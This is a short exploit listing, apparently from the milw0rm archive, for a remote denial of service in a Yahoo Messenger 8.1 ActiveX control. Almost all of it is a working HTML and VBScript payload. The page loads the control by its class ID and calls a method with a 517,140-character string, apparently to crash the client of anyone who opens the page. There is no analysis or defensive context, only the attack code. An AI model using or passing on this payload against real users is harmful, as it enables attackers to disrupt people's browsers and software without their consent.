Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Blake 14.07.2008 Verified
Denial of Service Exploits Windows

Exploit Code

Yahoo Messenger 8.1 (latest) Remote DoS
Safe for Scripting, Safe for Initialize

<html><body>

<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>
<script language=vbscript>


arg1=String(517140, "A")
target.c arg1


</script>
</body></html>

# milw0rm.com [2008-07-14]